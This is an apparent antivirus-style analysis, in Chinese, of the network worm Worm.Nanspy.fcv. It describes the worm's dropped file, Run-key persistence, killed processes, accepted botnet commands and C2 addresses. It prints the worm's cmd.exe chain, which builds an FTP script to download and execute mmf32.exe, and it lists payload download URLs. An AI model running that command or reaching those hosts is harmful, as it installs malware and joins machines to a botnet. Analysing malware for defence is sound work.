Worm.Nanspy.fcv

概述

病毒行為

:
這是一個通過網路傳播的蠕蟲病毒,該病毒會嘗試自更新,並且開啟後門接受控制端的控制,結束安全軟體,使被感染的機器成為一台網路殭屍.
1.生成檔案:
%System%\mmsvc32.exe
2.添加起始項,使病毒開機啟動:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Network Services Controller
mmsvc32.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Network Services Controller
mmsvc32.exe
3.查找並且關閉以下視窗進程,並且自己註冊一個該視窗使其無法開啟
DBMWin
TDBMWin
4.刪除以下鍵:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft IIS
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
PayTime
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
lp3mr1sh
5.創建執行緒運行以下的命令:
cmd.exe /c echo user [email protected]>ntsdd.txt
&& echo f729lQjd >>ntsdd.txt
&& echo binary>>ntsdd.txt
&& echo get mmf32.exe >>ntsdd.txt
&& echo quit>>ntsdd.txt
&& ftp -s:ntsdd.txt -n -nnpyf.cplnn.com
&& del ntsdd.txt
&& mmf32.exe
6.運行以下命令,結束安全軟體進程:
!proc.kill.* ftp.exe
!proc.kill.* tftp.exe
!proc.kill.* nh.exe
!proc.kill.* nethost.exe
!proc.kill.* syshost.exe
!proc.kill.* ppc.exe
!proc.kill.* paytime.exe
!proc.kill.* lp3mr1sh.exe
!proc.kill.* tibs.exe
!proc.kill.* opera.exe
!proc.kill.* netscape.exe
7.嘗試連線以下地址:
http://nnpy.cplnn.com/lipscr2.php

http://dnsf.nnctx.com.ru/ipconf.cfg
http://nnpyev.nnctx.com.ru/wad/nnpy.txt

http://www.ppwex.com/sdata.txt

http://wlog.cplnn.com/wlog.php?action=knock
8.能接收的命令如下:
!HTTP.DOS
!UDP.DDOS
!PROC.KILL
!RUN
!URL.DOWNLOAD
!UPDATE
!AFTP.CONFIG
!URL.SPOOF
!IE.COUNTER
9.嘗試下載以下檔案:
http://web.cplnn.com/bbot.exe
http://web.cplnn.com/psvc.exe
http://web.cplnn.com/psvc.exe
http://www.gmz41-soft.com/vxupd.exe